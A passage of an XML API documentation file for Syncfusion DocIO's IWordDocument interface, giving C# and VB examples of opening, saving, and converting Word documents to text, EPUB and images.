                Dim document As New WordDocument("Template.docx")
                'Get the collection of bookmark start in the word document
                Dim items As List(Of Entity) = document.GetCrossReferenceItems(ReferenceType.Bookmark)
                If items.Count &gt; 0 Then
                	'Change the first cross reference items owner paragraph back color as YelloGreen
                	TryCast(items(0), BookmarkStart).OwnerParagraph.ParagraphFormat.BackColor = Color.YellowGreen
                End If
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.SaveTxt(System.String,System.Text.Encoding)">
            <summary>
            Saves this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>as text file(.txt) with specified encoding.
            </summary>
            <param name="fileName">A string that contains the name of the file to save.</param>
            <param name="encoding">The character encoding to use.</param>
            <remarks>This method is not supported in Silverlight, WinRt, Windows Phone, Universal, UNiversal Windows Platform and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to convert the Word document into text file.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Save the document as Text file
                document.SaveTxt("sample.txt", Encoding.ASCII);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Save the document as Text file
                document.SaveTxt("sample.txt", Encoding.ASCII)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Open(System.String)">
            <summary>
            Opens an existing document.
            </summary>
            <param name="fileName">A string that contains the name of the file to open</param>
            <example>
            <para>The following code example demonstrates how to open an existing document from file system.</para>
            <remarks>This method is not supported in Silverlight, WinRt, Windows Phone, Universal, UNiversal Windows Platform and Xamarin platforms.</remarks>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Open an existing document from file system
                document.Open("Template.docx");
                //Saves the specified document
                document.Save("Sample.docx");
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                'Open an existing document from file system
                document.Open("Template.docx")
                'Saves the specified document
                document.Save("Sample.docx")
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Open(System.String,Syncfusion.DocIO.FormatType)">
            <summary>
            Opens an existing document of the specified file format type.
            </summary>
            <param name="fileName">A string that contains the name of the file to open.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <remarks>This method is not supported in Silverlight, WinRt, Windows Phone, Universal, UNiversal Windows Platform and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open an existing document of the specified type from file system.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Open an existing document from file system
                document.Open("Template.docx", FormatType.docx);
                //Saves the specified document
                document.Save("Sample.docx", FormatType.docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                'Open an existing document from file system
                document.Open("Template.docx", FormatType.docx)
                'Saves the specified document
                document.Save("Sample.docx", FormatType.docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Open(System.String,Syncfusion.DocIO.FormatType,Syncfusion.DocIO.DLS.XHTMLValidationType,System.String)">
            <summary>
            Opens an existing document of the specified file format type with HTML file validation options and base path for relative path to absolute path conversion.
            </summary>
            <param name="fileName">A string that contains the name of the file to open.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <param name="validationType">The XHTML validation type used to validate the HTML file, if the <paramref name="formatType"/> is <see cref="!:FormatType.HTML"/>.</param>
            <param name="baseUrl">Base path which is used to convert the relative path in the HTML file to absolute path.</param>
            <remarks>This method is not supported in Silverlight, WinRt, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open a protected document of the specified type from file system.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Open an existing document from file system
                document.Open("Template.docx", FormatType.docx,  XHTMLValidationType.Strict, basePath);
                //Saves the specified document
                document.Save("Sample.docx", FormatType.docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                'Open an existing document from file system
                document.Open("Template.docx", FormatType.docx, "password",  XHTMLValidationType.Strict, basePath)
                'Saves the specified document
                document.Save("Sample.docx", FormatType.docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Open(System.String,Syncfusion.DocIO.FormatType,Syncfusion.DocIO.DLS.XHTMLValidationType)">
            <summary>
            Opens an existing document of the specified file format type with HTML file validation options.
            </summary>
            <param name="fileName">A string that contains the name of the file to open.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <param name="validationType">The XHTML validation type used to validate the HTML file, if the <paramref name="formatType"/> is <see cref="!:FormatType.HTML"/>.</param>
            <remarks>This method is not supported in Silverlight, WinRt, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open a protected document of the specified type from file system.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Open an existing document from file system
                document.Open("Template.docx", FormatType.docx,  XHTMLValidationType.Strict);
                //Saves the specified document
                document.Save("Sample.docx", FormatType.docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                'Open an existing document from file system
                document.Open("Template.docx", FormatType.docx, "password",  XHTMLValidationType.Strict)
                'Saves the specified document
                document.Save("Sample.docx", FormatType.docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Open(System.String,Syncfusion.DocIO.FormatType,System.String)">
            <summary>
            Opens an existing document of the specified file format type, which is protected with password.
            </summary>
            <param name="fileName">A string that contains the name of the file to open.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <param name="password">The password used to decrypt the protected file.</param>
            <remarks>This method is not supported in Silverlight, WinRt, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open a protected document of the specified type from file system.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Open an existing document from file system
                document.Open("Template.docx", FormatType.docx, "password");
                //Saves the specified document
                document.Save("Sample.docx", FormatType.docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                'Open an existing document from file system
                document.Open("Template.docx", FormatType.docx, "password")
                'Saves the specified document
                document.Save("Sample.docx", FormatType.docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.OpenReadOnly(System.String,Syncfusion.DocIO.FormatType)">
            <summary>
            Opens an existing document of the specified file format type in read-only mode.
            </summary>
            <param name="strFileName">A string that contains the name of the file to open.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <remarks>This method is not supported in Silverlight, WinRt, Windows Phone, Universal, UNiversal Windows Platform and Xamarin platforms.</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Save(System.String)">
            <summary>
            Saves this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> to the specified file.
            </summary>
            <param name="fileName">A string that contains the name of the document to save.</param>
            <remarks>This method is not supported in Silverlight, WinRt, Windows Phone, Universal, UNiversal Windows Platform and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open an existing document from file system.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Open an existing document from file system
                document.Open("Template.docx");
                //Saves the specified document
                document.Save("Sample.docx");
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                'Open an existing document from file system
                document.Open("Template.docx")
                'Saves the specified document
                document.Save("Sample.docx")
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Save(System.String,Syncfusion.DocIO.FormatType)">
            <summary>
            Saves this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> to the specified file in the specified format.
            </summary>
            <param name="fileName">A string that contains the name of the document to save.</param>
            <param name="formatType">The format in which the document is saved.</param>
            <remarks>This method is not supported in Silverlight, WinRt, Windows Phone, Universal, UNiversal Windows Platform and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open an existing document from file system.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Open an existing document from file system
                document.Open("Template.docx");
                //Saves the specified document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                'Open an existing document from file system
                document.Open("Template.docx")
                'Saves the specified document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.SaveAsEpub(System.String,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Saves this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> as EPUB.
            </summary>
            <param name="fileName">A string that contains the name of the file to save.</param>
            <param name="coverImage">The cover page image of the EPUB.</param>
            <remarks>This method is not supported in Silverlight, WinRt, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to convert the Word document to EPub file.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                MemoryStream stream = new MemoryStream();
                //Create the new WPicture for cover page image
                WPicture coverImage = new WPicture(document);
                coverImage.LoadImage(Image.FromFile("CoverImage.png"));
                //Save the document as EPUB
                document.SaveAsEpub("sample.epub", coverImage);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                Dim stream As New MemoryStream()
                'Create the new WPicture for cover page image
                Dim coverImage As New WPicture(document)
                coverImage.LoadImage(Image.FromFile("CoverImage.png"))
                'Save the document as EPUB
                document.SaveAsEpub("sample.epub", coverImage)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Save(System.String,Syncfusion.DocIO.FormatType,System.Web.HttpResponse,Syncfusion.DocIO.HttpContentDisposition)">
            <summary>
            Saves this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> to the specified file in the specified format.
            </summary>
            <param name="fileName">A string that contains the name of the document to save.</param>
            <param name="formatType">The format in which the document is saved.</param>
            <param name="response">The HTTP response information.</param>
            <param name="contentDisposition">Specifies options to stream content to browser.</param>
            <remarks>This method is not supported in Silverlight, WinRt, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open an existing document from file system.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Open an existing document from file system
                document.Open("Template.docx");
                //Saves the specified document
                document.Save("Sample.docx", FormatType.Docx, Response, HttpContentDisposition.Attachment);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                'Open an existing document from file system
                document.Open("Template.docx")
                'Saves the specified document
                document.Save("Sample.docx", FormatType.Docx, Response, HttpContentDisposition.Attachment)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.SaveAsEpub(System.String,Syncfusion.DocIO.DLS.WPicture,System.Web.HttpResponse,Syncfusion.DocIO.HttpContentDisposition)">
            <summary>
            Saves this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> as EPUB.
            </summary>
            <param name="fileName">A string that contains the name of the file to save.</param>
            <param name="coverImage">The cover page image of the EPUB.</param>
            <param name="response">The HTTP response information.</param>
            <param name="contentDisposition">Specifies options to stream content to browser.</param>
            <remarks>This method is not supported in Silverlight, WinRt, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to </para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                MemoryStream stream = new MemoryStream();
                //Create the new WPicture for cover page image
                WPicture coverImage = new WPicture(document);
                coverImage.LoadImage(Image.FromFile("CoverImage.png"));
                //Save the document as EPUB
                document.SaveAsEpub("sample.epub", coverImage, Response, HttpContentDisposition.Attachment);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                Dim stream As New MemoryStream()
                'Create the new WPicture for cover page image
                Dim coverImage As New WPicture(document)
                coverImage.LoadImage(Image.FromFile("CoverImage.png"))
                'Save the document as EPUB
                document.SaveAsEpub("sample.epub", coverImage, Response, HttpContentDisposition.Attachment)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Open(System.IO.Stream,Syncfusion.DocIO.FormatType,Syncfusion.DocIO.DLS.XHTMLValidationType,System.String)">
            <summary>
            Opens an existing document of the specified file format type from the data stream with HTML file validation options and base path for relative path to absolute path conversion.
            </summary>
            <param name="stream">A <see cref="T:System.IO.Stream"/> that contains the data for this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <param name="validationType">The XHTML validation type used to validate the html file, if the <paramref name="formatType"/> is <see cref="!:FormatType.HTML"/>.</param>
            <param name="baseUrl">Base path which is used to convert the relative path in the HTML file to absolute path.</param>
            <remarks>This method is not supported in Silverlight, WinRt, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open an existing document of the specified type from data stream with XHTML validation options.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                Stream fileStream = new FileStream("Sample.html", FileMode.Open, FileAccess.Read, FileShare.Read);
                //Open an existing document from file system
                document.Open(fileStream, FormatType.docx,  XHTMLValidationType.Strict, basepath);
                //Saves the specified document
                document.Save("Sample.docx", FormatType.docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                Dim fileStream As Stream = New FileStream("Sample.html", FileMode.Open, FileAccess.Read, FileShare.Read)
                'Open an existing document from file system
                document.Open(fileStream, FormatType.docx,  XHTMLValidationType.Strict, basepath)
                'Saves the specified document
                document.Save("Sample.docx", FormatType.docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Open(System.IO.Stream,Syncfusion.DocIO.FormatType,Syncfusion.DocIO.DLS.XHTMLValidationType)">
            <summary>
            Opens an existing document of the specified file format type from the data stream with HTML validation options.
            </summary>
            <param name="stream">A <see cref="T:System.IO.Stream"/> that contains the data for this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <param name="validationType">The XHTML validation type used to validate the HTML file, if the <paramref name="formatType"/> is <see cref="!:FormatType.HTML"/>.</param>
            <remarks>This method is not supported in Silverlight, WinRt, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open an existing document of the specified type from data stream with XHTML validation options.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                Stream fileStream = new FileStream("Sample.html", FileMode.Open, FileAccess.Read, FileShare.Read);
                //Open an existing document from file system
                document.Open(fileStream, FormatType.docx,  XHTMLValidationType.Strict);
                //Saves the specified document
                document.Save("Sample.docx", FormatType.docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                Dim fileStream As Stream = New FileStream("Sample.html", FileMode.Open, FileAccess.Read, FileShare.Read)
                'Open an existing document from file system
                document.Open(fileStream, FormatType.docx,  XHTMLValidationType.Strict)
                'Saves the specified document
                document.Save("Sample.docx", FormatType.docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Open(System.IO.Stream,Syncfusion.DocIO.FormatType)">
            <summary>
            Opens an existing document of the specified file format type from the data stream.
            </summary>
            <param name="stream">A <see cref="T:System.IO.Stream"/> that contains the data for this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <example>
            <para>The following code example demonstrates how to open an existing document of the specified type from data stream.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                Stream fileStream = new FileStream("Sample.docx", FileMode.Open, FileAccess.Read, FileShare.Read);
                //Open an existing document from file system
                document.Open(fileStream, FormatType.docx);
                //Saves the specified document
                document.Save("Sample.docx", FormatType.docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                Dim fileStream As Stream = New FileStream("Sample.docx", FileMode.Open, FileAccess.Read, FileShare.Read)
                'Open an existing document from file system
                document.Open(fileStream, FormatType.docx)
                'Saves the specified document
                document.Save("Sample.docx", FormatType.docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Open(System.IO.Stream,Syncfusion.DocIO.FormatType,System.String)">
            <summary>
            Opens an existing document of the specified file format type from the data stream, which is protected with password.
            </summary>
            <param name="stream">A <see cref="T:System.IO.Stream"/> that contains the data for this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <param name="password">The password used to decrypt the document.</param>
            <remarks>This method is not supported in MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open a protected document of the specified type from data stream.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                Stream fileStream = new FileStream("Sample.docx", FileMode.Open, FileAccess.Read, FileShare.Read);
                //Open an existing document from file system
                document.Open(fileStream, FormatType.docx, "password");
                //Saves the specified document
                document.Save("Sample.docx", FormatType.docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                Dim fileStream As Stream = New FileStream("Sample.docx", FileMode.Open, FileAccess.Read, FileShare.Read)
                'Open an existing document from file system
                document.Open(fileStream, FormatType.docx, "password")
                'Saves the specified document
                document.Save("Sample.docx", FormatType.docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Save(System.IO.Stream,Syncfusion.DocIO.FormatType)">
            <summary>
            Saves this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> to the specified stream in the specified file format type.
            </summary>
            <param name="stream">The Stream where the document will be saved.</param>
            <param name="formatType">The format in which the document is saved.</param>
            <example>
            <para>The following code example demonstrates how to save the document to <c>MemoryStream</c></para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                MemoryStream stream = new MemoryStream();
                //Save the document to stream
                document.Save(stream, FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                Dim stream As New MemoryStream()
                'Save the document to stream
                document.Save(stream, FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Close">
            <summary>
            Release the resources occupied by this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.RenderAsImages(Syncfusion.DocIO.DLS.ImageType)">
            <summary>
            Converts the whole document into an images.
            </summary>
            <param name="type">An ImageType that specifies the type of the image to render.</param>
            <returns>Return the array of images that contains the each document page as single image.</returns>
            <remarks>
                <para>
                    Layouting the contents of a Word document as pages in the Essential DocIO is not exactly the same as the layouting in Microsoft Word. So, the total number of pages and each page content may vary slightly compared to that of the Microsoft Word.
                </para>
                <para>
                    This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.
                </para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to convert the Word document to image.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument wordDocument = new WordDocument("Template.docx", FormatType.Docx);
                //Initialize ChartToImageConverter for converting charts during Word to image conversion
                wordDocument.ChartToImageConverter = new ChartToImageConverter();
                //Set the scaling mode for charts (Normal mode reduces the file size)
                wordDocument.ChartToImageConverter.ScalingMode = ScalingMode.Normal;
                //Convert word document to image
                Image[] images = wordDocument.RenderAsImages(ImageType.Bitmap);
                int i = 0;
                foreach (Image image in images)
                {
                    //Save the images as jpeg
                    image.Save("WordToImage_" + i + ".jpeg", ImageFormat.Jpeg);
                    i++;
                }
                //Close the document
                wordDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim wordDocument As New WordDocument("Template.docx", FormatType.Docx)
                'Initialize ChartToImageConverter for converting charts during Word to image conversion
                wordDocument.ChartToImageConverter = New ChartToImageConverter()
                'Set the scaling mode for charts (Normal mode reduces the file size)
                wordDocument.ChartToImageConverter.ScalingMode = ScalingMode.Normal
                'Convert word document to image
                Dim images As Image() = wordDocument.RenderAsImages(ImageType.Bitmap)
                Dim i As Integer = 0
                For Each image As Image In images
                    'Save the images as jpeg
                    image.Save("WordToImage_" &amp; i &amp; ".jpeg", ImageFormat.Jpeg)
                    i += 1
                Next
                'Close the document
                wordDocument.Close()
            End Sub
            </code>
            </example>
            <seealso cref="P:Syncfusion.DocIO.DLS.WordDocument.ChartToImageConverter"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.RenderAsImages(System.Int32,System.Drawing.Imaging.ImageFormat)">
            <summary>
            Converts the specified document page into image.
            </summary>
            <param name="pageIndex">
            The zero based page index that represent which page to convert.
            </param>
            <param name="type">
            An ImageFormat that specifies the format of the saved image.
            </param>
            <returns>
            An <see cref="T:System.IO.Stream"/> that represent specified document page as image.
            </returns>
            <remarks>
                <para>
                    Layouting the contents of a Word document as pages in the Essential DocIO is not exactly the same as the layouting in Microsoft Word. So, the total number of pages may vary slightly compared to that of the Microsoft Word.
                </para>
                <para>
                    This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.
                </para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to convert the Word document to image.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument wordDocument = new WordDocument("Template.docx", FormatType.Docx);
                //Initialize ChartToImageConverter for converting charts during Word to image conversion
                wordDocument.ChartToImageConverter = new ChartToImageConverter();
                //Set the scaling mode for charts (Normal mode reduces the file size)
                wordDocument.ChartToImageConverter.ScalingMode = ScalingMode.Normal;
                //Convert word document to stream
                Stream imageStream = wordDocument.RenderAsImages(2, System.Drawing.Imaging.ImageFormat.Bmp);
                //Convert the stream to Image
                Image image = Image.FromStream(imageStream);
                //Save the image as jpeg
                image.Save("WordToImage.jpeg", ImageFormat.Jpeg);
                //Close the document
                wordDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim wordDocument As New WordDocument("Template.docx", FormatType.Docx)
                'Initialize ChartToImageConverter for converting charts during Word to image conversion
                wordDocument.ChartToImageConverter = New ChartToImageConverter()
                'Set the scaling mode for charts (Normal mode reduces the file size)
                wordDocument.ChartToImageConverter.ScalingMode = ScalingMode.Normal
                'Convert word document to stream
                Dim imageStream As Stream = wordDocument.RenderAsImages(2, System.Drawing.Imaging.ImageFormat.Bmp)
                'Convert the stream to Image
                Dim image As Image = Image.FromStream(imageStream)
                'Save the image as jpeg
                image.Save("WordToImage.jpeg", ImageFormat.Jpeg)
                'Close the document
                wordDocument.Close()
            End Sub
            </code>
            </example>
            <seealso cref="P:Syncfusion.DocIO.DLS.WordDocument.ChartToImageConverter"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.RenderAsImages(System.Int32,Syncfusion.DocIO.DLS.ImageType)">
            <summary>
            Converts the specified document page into image.
            </summary>
            <param name="pageIndex">
            The zero based page index that represent which page to convert.
            </param>
            <param name="type">
            An ImageType that specifies the type of the image to render.
            </param>
            <returns>
            An <see cref="T:System.Drawing.Image"/> that represent specified document page as image.
            </returns>
            <remarks>
                <para>
                    Layouting the contents of a Word document as pages in the Essential DocIO is not exactly the same as the layouting in Microsoft Word. So, the total number of pages may vary slightly compared to that of the Microsoft Word.
                </para>
                <para>
                    This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.
                </para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to convert the specified Word document page as image.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument wordDocument = new WordDocument("Template.docx", FormatType.Docx);
                //Initialize ChartToImageConverter for converting charts during Word to image conversion
                wordDocument.ChartToImageConverter = new ChartToImageConverter();
                //Set the scaling mode for charts (Normal mode reduces the file size)
                wordDocument.ChartToImageConverter.ScalingMode = ScalingMode.Normal;
                //Convert word document to image
                Image image = wordDocument.RenderAsImages(2, ImageType.Bitmap);
                //Save the image
                image.Save("WordToImage.jpeg", ImageFormat.Jpeg);
                //Close the document
                wordDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim wordDocument As New WordDocument("Template.docx", FormatType.Docx)
                'Initialize ChartToImageConverter for converting charts during Word to image conversion
                wordDocument.ChartToImageConverter = New ChartToImageConverter()
                'Set the scaling mode for charts (Normal mode reduces the file size)
                wordDocument.ChartToImageConverter.ScalingMode = ScalingMode.Normal
                'Convert word document to image
                Dim image As Image = wordDocument.RenderAsImages(2, ImageType.Bitmap)
                'Save the images as jpeg
                image.Save("WordToImage_" &amp; i &amp; ".jpeg", ImageFormat.Jpeg)
                'Close the document
                wordDocument.Close()
            End Sub
            </code>
            </example>
            <seealso cref="P:Syncfusion.DocIO.DLS.WordDocument.ChartToImageConverter"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.RenderAsImages(System.Int32,System.Int32,Syncfusion.DocIO.DLS.ImageType)">
            <summary>
            Converts the specified range of document pages into images
            </summary>
            <param name="pageIndex">
            The zero based page index that represents the starting document page index.
            </param>
            <param name="noOfPages">
            The total number of pages to convert.
            </param>
            <param name="type">
            An ImageType That specifies the type of the image to render.
            </param>
            <returns>
            An array of images that represent specified range of document pages as images.
            </returns>
